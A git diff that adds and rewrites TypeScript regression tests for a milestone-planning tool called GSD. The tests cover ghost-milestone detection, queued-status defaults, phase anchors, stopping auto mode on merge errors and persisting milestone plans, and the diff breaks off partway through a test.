-    mkdirSync(join(root, ".gsd"));
-    _clearGsdRootCache();
-    const first = gsdRoot(root);
-    const second = gsdRoot(root);
-    assertEq(first, second, "cache: same result returned on second call");
-    assertTrue(first === second, "cache: identity check (same string)");
-  } finally { cleanup(root); }
-}
-
-{
-  // Case 6: .gsd at basePath takes precedence over ancestor .gsd
-  const outer = tmp();
-  try {
-    initGit(outer);
-    mkdirSync(join(outer, ".gsd"));
-    const inner = join(outer, "nested");
-    mkdirSync(join(inner, ".gsd"), { recursive: true });
-    _clearGsdRootCache();
-    const result = gsdRoot(inner);
-    assertEq(result, join(inner, ".gsd"), "precedence: nearest .gsd wins over ancestor");
-  } finally { cleanup(outer); }
-}
-
-report();
diff --git a/src/resources/extensions/gsd/tests/phantom-ghost-detection.test.ts b/src/resources/extensions/gsd/tests/phantom-ghost-detection.test.ts
new file mode 100644
index 000000000..06878f25a
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/phantom-ghost-detection.test.ts
@@ -0,0 +1,55 @@
+/**
+ * Regression test for #3671 — isGhostMilestone detects phantom queued rows
+ *
+ * gsd_milestone_generate_id inserts a DB row with status "queued" as a side
+ * effect. If the milestone is never planned, isGhostMilestone previously
+ * returned false for any milestone with a DB row, blocking the state machine.
+ *
+ * The fix makes isGhostMilestone treat a "queued" DB row with no disk
+ * artifacts (CONTEXT, ROADMAP, SUMMARY) as a ghost.
+ *
+ * This structural test verifies the dbRow.status === 'queued' guard exists.
+ */
+
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+import { fileURLToPath } from 'node:url';
+import { dirname, join } from 'node:path';
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+
+const source = readFileSync(join(__dirname, '..', 'state.ts'), 'utf-8');
+
+describe('isGhostMilestone phantom queued detection (#3671)', () => {
+  test('isGhostMilestone function exists', () => {
+    assert.match(source, /export function isGhostMilestone\(/,
+      'isGhostMilestone should be exported');
+  });
+
+  test('checks dbRow.status === queued', () => {
+    assert.match(source, /dbRow\.status\s*===\s*['"]queued['"]/,
+      'isGhostMilestone should check dbRow.status === "queued"');
+  });
+
+  test('checks for CONTEXT disk artifact', () => {
+    assert.match(source, /resolveMilestoneFile\(basePath,\s*mid,\s*["']CONTEXT["']\)/,
+      'should check for CONTEXT file');
+  });
+
+  test('checks for ROADMAP disk artifact', () => {
+    assert.match(source, /resolveMilestoneFile\(basePath,\s*mid,\s*["']ROADMAP["']\)/,
+      'should check for ROADMAP file');
+  });
+
+  test('checks for SUMMARY disk artifact', () => {
+    assert.match(source, /resolveMilestoneFile\(basePath,\s*mid,\s*["']SUMMARY["']\)/,
+      'should check for SUMMARY file');
+  });
+
+  test('returns !hasContent for queued rows (ghost if no artifacts)', () => {
+    assert.match(source, /return !hasContent/,
+      'should return !hasContent for queued phantom milestones');
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/phantom-milestone-default-queued.test.ts b/src/resources/extensions/gsd/tests/phantom-milestone-default-queued.test.ts
new file mode 100644
index 000000000..97c12b4a3
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/phantom-milestone-default-queued.test.ts
@@ -0,0 +1,39 @@
+/**
+ * Regression test for #3695 — insertMilestone defaults status to "queued"
+ *
+ * Milestones were being auto-created with status "active", causing phantom
+ * milestones to appear as active work.  The fix defaults to "queued" so
+ * new milestones must be explicitly activated.
+ */
+
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+import { fileURLToPath } from 'node:url';
+import { dirname, join } from 'node:path';
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+
+const dbSrc = readFileSync(
+  join(__dirname, '..', 'gsd-db.ts'),
+  'utf-8',
+);
+
+describe('insertMilestone defaults status to queued (#3695)', () => {
+  test('insertMilestone function exists', () => {
+    assert.match(dbSrc, /export function insertMilestone\(/,
+      'insertMilestone should be exported from gsd-db.ts');
+  });
+
+  test('default status is "queued" not "active"', () => {
+    // The status parameter should default to "queued" via nullish coalescing
+    assert.match(dbSrc, /m\.status\s*\?\?\s*"queued"/,
+      'insertMilestone should default status to "queued"');
+  });
+
+  test('comment explains the rationale', () => {
+    assert.match(dbSrc, /never auto-create milestones as "active"/i,
+      'should have a comment explaining why default is queued');
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/phase-anchor.test.ts b/src/resources/extensions/gsd/tests/phase-anchor.test.ts
new file mode 100644
index 000000000..825bb6cc8
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/phase-anchor.test.ts
@@ -0,0 +1,83 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, rmSync, existsSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import { writePhaseAnchor, readPhaseAnchor, formatAnchorForPrompt } from "../phase-anchor.js";
+import type { PhaseAnchor } from "../phase-anchor.js";
+
+function makeTempBase(): string {
+  const tmp = mkdtempSync(join(tmpdir(), "gsd-anchor-test-"));
+  mkdirSync(join(tmp, ".gsd", "milestones", "M001", "anchors"), { recursive: true });
+  return tmp;
+}
+
+test("writePhaseAnchor creates anchor file in correct location", () => {
+  const base = makeTempBase();
+  try {
+    const anchor: PhaseAnchor = {
+      phase: "discuss",
+      milestoneId: "M001",
+      generatedAt: new Date().toISOString(),
+      intent: "Define authentication requirements",
+      decisions: ["Use JWT tokens", "Session expiry 24h"],
+      blockers: [],
+      nextSteps: ["Plan the implementation slices"],
+    };
+    writePhaseAnchor(base, "M001", anchor);
+    assert.ok(existsSync(join(base, ".gsd", "milestones", "M001", "anchors", "discuss.json")));
+  } finally {
+    rmSync(base, { recursive: true, force: true });
+  }
+});
+
+test("readPhaseAnchor returns written anchor", () => {
+  const base = makeTempBase();
+  try {
+    const anchor: PhaseAnchor = {
+      phase: "plan",
+      milestoneId: "M001",
+      generatedAt: new Date().toISOString(),
+      intent: "Break work into slices",
+      decisions: ["3 slices: auth, UI, tests"],
+      blockers: ["Need DB schema first"],
+      nextSteps: ["Execute S01"],
+    };
+    writePhaseAnchor(base, "M001", anchor);
+    const read = readPhaseAnchor(base, "M001", "plan");
+    assert.ok(read);
+    assert.equal(read!.intent, "Break work into slices");
+    assert.deepEqual(read!.decisions, ["3 slices: auth, UI, tests"]);
+    assert.deepEqual(read!.blockers, ["Need DB schema first"]);
+  } finally {
+    rmSync(base, { recursive: true, force: true });
+  }
+});
+
+test("readPhaseAnchor returns null when no anchor exists", () => {
+  const base = makeTempBase();
+  try {
+    const read = readPhaseAnchor(base, "M001", "discuss");
+    assert.equal(read, null);
+  } finally {
+    rmSync(base, { recursive: true, force: true });
+  }
+});
+
+test("formatAnchorForPrompt produces markdown block", () => {
+  const anchor: PhaseAnchor = {
+    phase: "discuss",
+    milestoneId: "M001",
+    generatedAt: "2026-04-03T00:00:00.000Z",
+    intent: "Define requirements",
+    decisions: ["Use JWT"],
+    blockers: [],
+    nextSteps: ["Plan slices"],
+  };
+  const md = formatAnchorForPrompt(anchor);
+  assert.ok(md.includes("## Handoff from discuss"));
+  assert.ok(md.includes("Define requirements"));
+  assert.ok(md.includes("Use JWT"));
+  assert.ok(md.includes("Plan slices"));
+});
diff --git a/src/resources/extensions/gsd/tests/phases-merge-error-stops-auto.test.ts b/src/resources/extensions/gsd/tests/phases-merge-error-stops-auto.test.ts
new file mode 100644
index 000000000..5323d4ae4
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/phases-merge-error-stops-auto.test.ts
@@ -0,0 +1,103 @@
+/**
+ * phases-merge-error-stops-auto.test.ts — Regression test for #2766.
+ *
+ * When mergeAndExit throws a non-MergeConflictError, the auto loop must
+ * stop instead of continuing with unmerged work. This test verifies that
+ * all catch blocks in auto/phases.ts that handle mergeAndExit errors
+ * call stopAuto and return { action: "break" } for non-conflict errors.
+ */
+
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+import { createTestContext } from "./test-helpers.ts";
+
+const { assertTrue, report } = createTestContext();
+
+const phasesPath = join(import.meta.dirname, "..", "auto", "phases.ts");
+const phasesSrc = readFileSync(phasesPath, "utf-8");
+
+console.log("\n=== #2766: Non-MergeConflictError stops auto mode ===");
+
+// ── Test 1: phases.ts calls logError for non-conflict merge errors ──────
+
+assertTrue(
+  phasesPath.length > 0 && phasesPath.endsWith("phases.ts"),
+  "phases.ts file exists and is readable",
+);
+
+// Count all mergeAndExit catch blocks by finding "} catch (mergeErr)" patterns
+const mergeErrCatches = [...phasesPath.matchAll(/\} catch \(mergeErr\)/g)];
+// Use the source itself for matching
+const mergeErrCatchCount = [...phasesSrc.matchAll(/\} catch \(mergeErr\)/g)].length;
+assertTrue(
+  mergeErrCatchCount >= 3,
+  `all mergeAndExit call sites have catch (mergeErr) blocks (found ${mergeErrCatchCount}, expected >= 3)`,
+);
+
+// ── Test 2: Every mergeErr catch block handles non-MergeConflictError ───
+
+// Find each catch block and verify it has the non-conflict error handling pattern
+const catchPattern = /\} catch \(mergeErr\) \{/g;
+let match;
+let blocksWithNonConflictHandling = 0;
+let blocksTotal = 0;
+
+while ((match = catchPattern.exec(phasesSrc)) !== null) {
+  blocksTotal++;
+  // Look at the ~800 chars after the catch to find both the MergeConflictError
+  // instanceof check AND the non-conflict handling
+  const afterCatch = phasesSrc.slice(match.index, match.index + 1200);
+
+  const hasInstanceofCheck = afterCatch.includes("instanceof MergeConflictError");
+  const hasNonConflictStop = afterCatch.includes('reason: "merge-failed"');
+  const hasStopAuto = afterCatch.includes("stopAuto");
+  const hasLogError = afterCatch.includes("logError");
+
+  if (hasInstanceofCheck && hasNonConflictStop && hasStopAuto && hasLogError) {
+    blocksWithNonConflictHandling++;
+  }
+}
+
+assertTrue(
+  blocksWithNonConflictHandling === blocksTotal && blocksTotal >= 3,
+  `all ${blocksTotal} mergeAndExit catch blocks stop auto on non-conflict errors (${blocksWithNonConflictHandling}/${blocksTotal})`,
+);
+
+// ── Test 3: Non-conflict handler returns break (does not continue) ──────
+
+// Verify the pattern: after the MergeConflictError instanceof block,
+// the non-conflict path returns { action: "break", reason: "merge-failed" }
+const mergeFailedReasons = [...phasesSrc.matchAll(/reason: "merge-failed"/g)].length;
+assertTrue(
+  mergeFailedReasons >= 3,
+  `all catch blocks return reason: "merge-failed" (found ${mergeFailedReasons}, expected >= 3)`,
+);
+
+// ── Test 4: Non-conflict handler notifies user ──────────────────────────
+
+// Each non-conflict block should call ctx.ui.notify with error severity
+const notifyErrorPattern = /Merge failed:.*Resolve and run \/gsd auto to resume/g;
+const notifyCount = [...phasesSrc.matchAll(notifyErrorPattern)].length;
+assertTrue(
+  notifyCount >= 3,
+  `all catch blocks notify user about merge failure (found ${notifyCount}, expected >= 3)`,
+);
+
+// ── Test 5: logError replaces logWarning for non-conflict merge errors ──
+
+// The old code used logWarning — verify logError is used instead
+const logWarningMergePattern = /logWarning\(.*Milestone merge failed with non-conflict error/g;
+const logWarningCount = [...phasesSrc.matchAll(logWarningMergePattern)].length;
+assertTrue(
+  logWarningCount === 0,
+  "logWarning is no longer used for non-conflict merge errors (replaced by logError)",
+);
+
+const logErrorMergePattern = /logError\(.*Milestone merge failed with non-conflict error/g;
+const logErrorCount = [...phasesSrc.matchAll(logErrorMergePattern)].length;
+assertTrue(
+  logErrorCount >= 3,
+  `logError is used for non-conflict merge errors (found ${logErrorCount}, expected >= 3)`,
+);
+
+report();
diff --git a/src/resources/extensions/gsd/tests/plan-milestone-queue-context.test.ts b/src/resources/extensions/gsd/tests/plan-milestone-queue-context.test.ts
new file mode 100644
index 000000000..83a2f955d
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/plan-milestone-queue-context.test.ts
@@ -0,0 +1,48 @@
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import { buildPlanMilestonePrompt } from "../auto-prompts.ts";
+
+function createBase(): string {
+  const base = mkdtempSync(join(tmpdir(), "gsd-plan-queue-"));
+  mkdirSync(join(base, ".gsd", "milestones", "M010"), { recursive: true });
+  return base;
+}
+
+function cleanup(base: string): void {
+  rmSync(base, { recursive: true, force: true });
+}
+
+describe("plan-milestone queue context", () => {
+  test("includes queue brief when planning milestone without roadmap context", async () => {
+    const base = createBase();
+    try {
+      writeFileSync(
+        join(base, ".gsd", "QUEUE.md"),
+        [
+          "# Queue",
+          "",
+          "### M010: Analytics Dashboard — Interactivity, Intelligence & Demo Readiness",
+          "**Vision:** Ship a polished analytics dashboard with drilldowns and AI assistance.",
+          "",
+          "## Scope",
+          "- Interactivity",
+          "- Intelligence",
+          "- Demo readiness",
+          "",
+        ].join("\n"),
+      );
+
+      const prompt = await buildPlanMilestonePrompt("M010", "M010", base);
+
+      assert.match(prompt, /Source: `\.gsd\/QUEUE\.md`/);
+      assert.match(prompt, /Analytics Dashboard — Interactivity, Intelligence & Demo Readiness/);
+      assert.match(prompt, /Ship a polished analytics dashboard/);
+    } finally {
+      cleanup(base);
+    }
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/plan-milestone-title.test.ts b/src/resources/extensions/gsd/tests/plan-milestone-title.test.ts
new file mode 100644
index 000000000..5387773f4
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/plan-milestone-title.test.ts
@@ -0,0 +1,71 @@
+/**
+ * Regression test for #2879: gsd_plan_milestone silently drops milestone title
+ * when the DB row pre-exists from state reconciliation.
+ *
+ * Scenario: state reconciliation inserts a milestone row with an empty title
+ * (INSERT OR IGNORE). When gsd_plan_milestone is called later with a title,
+ * the title must be persisted — not silently dropped.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  getMilestone,
+  upsertMilestonePlanning,
+} from "../gsd-db.ts";
+
+test("upsertMilestonePlanning updates title when DB row pre-exists with empty title (#2879)", () => {
+  try {
+    openDatabase(":memory:");
+
+    // Step 1: Simulate state reconciliation — inserts milestone with empty title
+    insertMilestone({ id: "M099", status: "active" });
+    const before = getMilestone("M099");
+    assert.ok(before, "milestone row should exist after insertMilestone");
+    assert.equal(before.title, "", "title should be empty after reconciliation insert");
+
+    // Step 2: Simulate gsd_plan_milestone — insertMilestone is called again
+    // with a title, but INSERT OR IGNORE skips it since the row exists.
+    insertMilestone({ id: "M099", title: "My Important Milestone", status: "active" });
+    const afterInsert = getMilestone("M099");
+    assert.ok(afterInsert);
+    // The INSERT OR IGNORE means title is still empty — this is the known limitation
+    assert.equal(afterInsert.title, "", "INSERT OR IGNORE does not update existing row");
+
+    // Step 3: upsertMilestonePlanning should update the title
+    upsertMilestonePlanning("M099", {
+      title: "My Important Milestone",
+      vision: "Test vision",
+    });
+    const afterUpsert = getMilestone("M099");
+    assert.ok(afterUpsert);
+    assert.equal(
+      afterUpsert.title,
+      "My Important Milestone",
+      "title must be updated by upsertMilestonePlanning when row pre-exists",
+    );
+  } finally {
+    closeDatabase();
+  }
+});
+
+test("upsertMilestonePlanning preserves existing title when no title argument provided", () => {
+  try {
+    openDatabase(":memory:");
+
+    // Insert milestone with a title
+    insertMilestone({ id: "M100", title: "Original Title", status: "active" });
+
+    // Call upsertMilestonePlanning without a title — should preserve existing
+    upsertMilestonePlanning("M100", { vision: "Updated vision" });
+    const after = getMilestone("M100");
+    assert.ok(after);
+    assert.equal(after.title, "Original Title", "existing title must be preserved when no title argument given");
+  } finally {
+    closeDatabase();
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/plan-milestone.test.ts b/src/resources/extensions/gsd/tests/plan-milestone.test.ts
index 1bb23c6ee..0ce6a09f3 100644
--- a/src/resources/extensions/gsd/tests/plan-milestone.test.ts
+++ b/src/resources/extensions/gsd/tests/plan-milestone.test.ts
@@ -1,133 +1,295 @@
-// Tests for inlinePriorMilestoneSummary — the cross-milestone context bridging helper.
-//
-// Scenarios covered:
-//   (A) M002 with M001-SUMMARY.md present → returns string containing "Prior Milestone Summary" and summary content
-//   (B) M001 (no prior milestone in dir) → returns null
-//   (C) M002 with no M001-SUMMARY.md written → returns null
-//   (D) M003 with M002 dir present but no M002-SUMMARY.md → returns null
-
-import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from 'node:fs';
-import { join, dirname } from 'node:path';
+import test from 'node:test';
+import assert from 'node:assert/strict';
+import { mkdtempSync, mkdirSync, rmSync, readFileSync, existsSync, writeFileSync } from 'node:fs';
+import { join } from 'node:path';
 import { tmpdir } from 'node:os';
-import { fileURLToPath } from 'node:url';
 
-import { inlinePriorMilestoneSummary } from '../files.ts';
-import { createTestContext } from './test-helpers.ts';
+import { openDatabase, closeDatabase, getMilestone, getMilestoneSlices, getSlice, updateSliceStatus, deleteSlice, insertMilestone } from '../gsd-db.ts';
+import { handlePlanMilestone } from '../tools/plan-milestone.ts';
+import { parseRoadmap } from '../parsers-legacy.ts';
 
-// ─── Worktree-aware prompt loader ──────────────────────────────────────────
-const __dirname = dirname(fileURLToPath(import.meta.url));
-
-
-const { assertEq, assertTrue, report } = createTestContext();
-// ─── Fixture helpers ───────────────────────────────────────────────────────
-
-function createFixtureBase(): string {
-  const base = mkdtempSync(join(tmpdir(), 'gsd-plan-ms-test-'));
-  mkdirSync(join(base, '.gsd', 'milestones'), { recursive: true });
+function makeTmpBase(): string {
+  const base = mkdtempSync(join(tmpdir(), 'gsd-plan-milestone-'));
+  mkdirSync(join(base, '.gsd', 'milestones', 'M001'), { recursive: true });
   return base;
 }
 
-function writeMilestoneDir(base: string, mid: string): void {
-  mkdirSync(join(base, '.gsd', 'milestones', mid), { recursive: true });
-}
-
-function writeMilestoneSummary(base: string, mid: string, content: string): void {
-  const dir = join(base, '.gsd', 'milestones', mid);
-  mkdirSync(dir, { recursive: true });
-  writeFileSync(join(dir, `${mid}-SUMMARY.md`), content);
-}
-
 function cleanup(base: string): void {
-  rmSync(base, { recursive: true, force: true });
+  try { closeDatabase(); } catch { /* noop */ }
+  try { rmSync(base, { recursive: true, force: true }); } catch { /* noop */ }
 }
 
-// ═══════════════════════════════════════════════════════════════════════════
-// Tests
-// ═══════════════════════════════════════════════════════════════════════════
-
-async function main(): Promise<void> {
-
-  // ─── (A) M002 with M001-SUMMARY.md present ────────────────────────────────
-  console.log('\n── (A) M002 with M001-SUMMARY.md present → string containing "Prior Milestone Summary"');
-  {
-    const base = createFixtureBase();
-    try {
-      writeMilestoneDir(base, 'M001');
-      writeMilestoneDir(base, 'M002');
-      writeMilestoneSummary(base, 'M001', '# M001 Summary\n\nKey decisions: used TypeScript throughout.\n');
-
-      const result = await inlinePriorMilestoneSummary('M002', base);
-
-      assertTrue(result !== null, '(A) result is not null when prior milestone has SUMMARY');
-      assertTrue(
-        typeof result === 'string' && result.includes('Prior Milestone Summary'),
-        '(A) result contains "Prior Milestone Summary" label',
-      );
-      assertTrue(
-        typeof result === 'string' && result.includes('Key decisions: used TypeScript throughout.'),
-        '(A) result contains the summary file content',
-      );
-    } finally {
-      cleanup(base);
-    }
-  }
-
-  // ─── (B) M001 (no prior milestone in dir) ─────────────────────────────────
-  console.log('\n── (B) M001 — first milestone, no prior → null');
-  {
-    const base = createFixtureBase();
-    try {
-      writeMilestoneDir(base, 'M001');
-
-      const result = await inlinePriorMilestoneSummary('M001', base);
-
-      assertEq(result, null, '(B) M001 with no prior milestone → null');
-    } finally {
-      cleanup(base);
-    }
-  }
-
-  // ─── (C) M002 with no M001-SUMMARY.md ────────────────────────────────────
-  console.log('\n── (C) M002 with M001 dir but no M001-SUMMARY.md → null');
-  {
-    const base = createFixtureBase();
-    try {
-      writeMilestoneDir(base, 'M001');
-      writeMilestoneDir(base, 'M002');
-      // Intentionally do NOT write M001-SUMMARY.md
-
-      const result = await inlinePriorMilestoneSummary('M002', base);
-
-      assertEq(result, null, '(C) M002 when M001 has no SUMMARY file → null');
-    } finally {
-      cleanup(base);
-    }
-  }
-
-  // ─── (D) M003 with M002 dir but no M002-SUMMARY.md ───────────────────────
-  console.log('\n── (D) M003, M002 is immediately prior but has no SUMMARY → null');
-  {
-    const base = createFixtureBase();
-    try {
-      writeMilestoneDir(base, 'M001');
-      writeMilestoneDir(base, 'M002');
-      writeMilestoneDir(base, 'M003');
-      // M001 has a summary — but M002 (the immediately prior to M003) does NOT
-      writeMilestoneSummary(base, 'M001', '# M001 Summary\n\nOld context.\n');
-      // Intentionally do NOT write M002-SUMMARY.md
-
-      const result = await inlinePriorMilestoneSummary('M003', base);
-
-      assertEq(result, null, '(D) M003 when M002 (immediately prior) has no SUMMARY → null');
-    } finally {
-      cleanup(base);
-    }
-  }
-
-  report();
+function validParams() {
+  return {
+    milestoneId: 'M001',
+    title: 'DB-backed planning',
+    vision: 'Make planning write through the database.',
+    successCriteria: ['Planning persists', 'Roadmap renders from DB'],
+    keyRisks: [
+      { risk: 'Renderer mismatch', whyItMatters: 'Rendered roadmap may stop round-tripping.' },
+    ],
+    proofStrategy: [
+      { riskOrUnknown: 'Render correctness', retireIn: 'S01', whatWillBeProven: 'ROADMAP output matches DB state.' },
+    ],
+    verificationContract: 'Contract verification text',
+    verificationIntegration: 'Integration verification text',
+    verificationOperational: 'Operational verification text',
+    verificationUat: 'UAT verification text',
+    definitionOfDone: ['Tests pass', 'Tool reruns cleanly'],
+    requirementCoverage: 'Covers R015.',
+    boundaryMapMarkdown: '| From | To | Produces | Consumes |\n|------|----|----------|----------|\n| S01 | terminal | roadmap | nothing |',
+    slices: [
+      {
+        sliceId: 'S01',
+        title: 'Tool wiring',
+        risk: 'medium',
+        depends: [],
+        demo: 'The tool writes roadmap state.',
+        goal: 'Wire the handler.',
+        successCriteria: 'Handler persists state and renders markdown.',
+        proofLevel: 'integration',
+        integrationClosure: 'Downstream callers read rendered roadmap output.',
+        observabilityImpact: 'Tests expose render and validation failures.',
+      },
+      {
+        sliceId: 'S02',
+        title: 'Prompt migration',
+        risk: 'low',
+        depends: ['S01'],
+        demo: 'Prompts call the tool.',
+        goal: 'Migrate prompts to DB-backed path.',
+        successCriteria: 'Prompt contracts reference the new tool.',
+        proofLevel: 'integration',
+        integrationClosure: 'Prompt tests cover the new planning route.',
+        observabilityImpact: 'Prompt and rogue-write failures become explicit.',
+      },
+    ],
+  };
 }
 
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
+test('handlePlanMilestone writes milestone and slice planning state and renders roadmap', async () => {
+  const base = makeTmpBase();
+  const dbPath = join(base, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+
+  try {
+    const result = await handlePlanMilestone(validParams(), base);
+    assert.ok(!('error' in result), `unexpected error: ${'error' in result ? result.error : ''}`);
+
+    const milestone = getMilestone('M001');
+    assert.ok(milestone, 'milestone should exist');
+    assert.equal(milestone?.vision, 'Make planning write through the database.');
+    assert.deepEqual(milestone?.success_criteria, ['Planning persists', 'Roadmap renders from DB']);
+    assert.equal(milestone?.verification_contract, 'Contract verification text');
+
+    const slices = getMilestoneSlices('M001');
+    assert.equal(slices.length, 2);
+    assert.equal(slices[0]?.id, 'S01');
+    assert.equal(slices[0]?.goal, 'Wire the handler.');
+    assert.equal(slices[1]?.depends[0], 'S01');
+
+    const roadmapPath = join(base, '.gsd', 'milestones', 'M001', 'M001-ROADMAP.md');
+    assert.ok(existsSync(roadmapPath), 'roadmap should be rendered to disk');
+    const roadmap = readFileSync(roadmapPath, 'utf-8');
+    assert.match(roadmap, /# M001: DB-backed planning/);
+    assert.match(roadmap, /## Vision/);
+    assert.match(roadmap, /Make planning write through the database\./);
+    assert.match(roadmap, /## Slice Overview/);
+    assert.match(roadmap, /\| S01 \| Tool wiring \| medium \|/);
+    assert.match(roadmap, /\| S02 \| Prompt migration \| low \| S01 \|/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handlePlanMilestone rejects invalid payloads', async () => {
+  const base = makeTmpBase();
+  const dbPath = join(base, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+
+  try {
+    const params = validParams();
+    const result = await handlePlanMilestone({ ...params, slices: [] }, base);
+    assert.ok('error' in result);
+    assert.match(result.error, /validation failed: slices must be a non-empty array/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handlePlanMilestone surfaces render failures and does not clear parse-visible state on failure', async () => {
+  const base = makeTmpBase();
+  const dbPath = join(base, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+
+  try {
+    const fallbackRoadmapPath = join(base, '.gsd', 'milestones', 'MISSING', 'MISSING-ROADMAP.md');
+    mkdirSync(fallbackRoadmapPath, { recursive: true });
+
+    const result = await handlePlanMilestone({ ...validParams(), milestoneId: 'MISSING' }, base);
+    assert.ok('error' in result);
+    assert.match(result.error, /render failed:/);
+
+    const existingRoadmapPath = join(base, '.gsd', 'milestones', 'M001', 'M001-ROADMAP.md');
+    writeFileSync(existingRoadmapPath, '# M001: Cached roadmap\n\n**Vision:** old value\n\n## Slices\n\n', 'utf-8');
+    const cachedAfter = parseRoadmap(readFileSync(existingRoadmapPath, 'utf-8'));
+    assert.equal(cachedAfter.vision, 'old value');
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handlePlanMilestone clears parse-visible roadmap state after successful render', async () => {
+  const base = makeTmpBase();
+  const dbPath = join(base, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+
+  try {
+    const roadmapPath = join(base, '.gsd', 'milestones', 'M001', 'M001-ROADMAP.md');
+    writeFileSync(roadmapPath, '# M001: Cached roadmap\n\n**Vision:** old value\n\n## Slices\n\n', 'utf-8');
+
+    const cachedBefore = parseRoadmap(readFileSync(roadmapPath, 'utf-8'));
+    assert.equal(cachedBefore.vision, 'old value');
+
+    const result = await handlePlanMilestone(validParams(), base);
+    assert.ok(!('error' in result));
+
+    const contentAfter = readFileSync(roadmapPath, 'utf-8');
+    assert.match(contentAfter, /Make planning write through the database\./);
+    assert.match(contentAfter, /S01/);
+    assert.match(contentAfter, /S02/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handlePlanMilestone reruns idempotently and updates existing planning state', async () => {
+  const base = makeTmpBase();
+  const dbPath = join(base, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+
+  try {
+    const first = await handlePlanMilestone(validParams(), base);
+    assert.ok(!('error' in first));
+
+    const second = await handlePlanMilestone({
+      ...validParams(),
+      vision: 'Updated vision',
+      slices: [
+        {
+          ...validParams().slices[0],
+          goal: 'Updated goal',
+          observabilityImpact: 'Updated observability',
+        },
+        validParams().slices[1],
+      ],
+    }, base);
+    assert.ok(!('error' in second));
+
+    const milestone = getMilestone('M001');
+    assert.equal(milestone?.vision, 'Updated vision');
+
+    const slices = getMilestoneSlices('M001');
+    assert.equal(slices.length, 2);
+    assert.equal(slices[0]?.goal, 'Updated goal');
+    assert.equal(slices[0]?.observability_impact, 'Updated observability');
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handlePlanMilestone preserves completed slice status on re-plan (#2558)', async () => {
+  const base = makeTmpBase();
+  const dbPath = join(base, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+
+  try {
+    // Initial plan — both slices start as "pending"
+    const first = await handlePlanMilestone(validParams(), base);
+    assert.ok(!('error' in first), `unexpected error: ${'error' in first ? first.error : ''}`);
+
+    // Mark S01 as complete (simulates work done in a worktree)
+    updateSliceStatus('M001', 'S01', 'complete', new Date().toISOString());
+
+    const s01Before = getSlice('M001', 'S01');
+    assert.equal(s01Before?.status, 'complete', 'S01 should be complete before re-plan');
+
+    // Re-plan the same milestone — S01 must stay "complete", S02 stays "pending"
+    const second = await handlePlanMilestone(validParams(), base);
+    assert.ok(!('error' in second), `unexpected error: ${'error' in second ? second.error : ''}`);
+
+    const s01After = getSlice('M001', 'S01');
+    assert.equal(s01After?.status, 'complete', 'S01 status must be preserved as complete after re-plan');
+
+    const s02After = getSlice('M001', 'S02');
+    assert.equal(s02After?.status, 'pending', 'S02 should remain pending');
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('plan-milestone re-plan preserves completed status and updates slice fields (#2558)', async () => {
+  const base = makeTmpBase();
+  const dbPath = join(base, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+
+  try {
+    // Initial plan — both slices start as "pending"
+    const first = await handlePlanMilestone(validParams(), base);
+    assert.ok(!('error' in first), `unexpected error: ${'error' in first ? first.error : ''}`);
+
+    // Mark S01 as complete (simulates work done in worktree, then reconciled)
+    updateSliceStatus('M001', 'S01', 'complete', new Date().toISOString());
+    assert.equal(getSlice('M001', 'S01')?.status, 'complete');
+
+    // Re-plan with updated title for S01.
+    // The handler must:
+    //   1. NOT downgrade S01 from "complete" to "pending"
+    //   2. Update S01's non-status fields (title, risk, depends, demo)
+    //   3. Keep S02 as "pending"
+    const updatedParams = {
+      ...validParams(),
+      slices: [
+        { ...validParams().slices[0], title: 'Updated S01 title', risk: 'high' },
+        validParams().slices[1],
+      ],
+    };
+    const second = await handlePlanMilestone(updatedParams, base);
+    assert.ok(!('error' in second), `unexpected error: ${'error' in second ? second.error : ''}`);
+
+    const s01After = getSlice('M001', 'S01');
+    assert.equal(s01After?.status, 'complete', 'completed slice status must survive re-plan');
+    assert.equal(s01After?.title, 'Updated S01 title', 'title should update on re-plan');
+    assert.equal(s01After?.risk, 'high', 'risk should update on re-plan');
+
+    const s02After = getSlice('M001', 'S02');
+    assert.equal(s02After?.status, 'pending', 'pending slice stays pending');
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handlePlanMilestone promotes pre-existing queued milestone to active (#3022)', async () => {
+  const base = makeTmpBase();
+  const dbPath = join(base, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+
+  try {
+    // Simulate ensureMilestoneDbRow: pre-create row with status "queued"
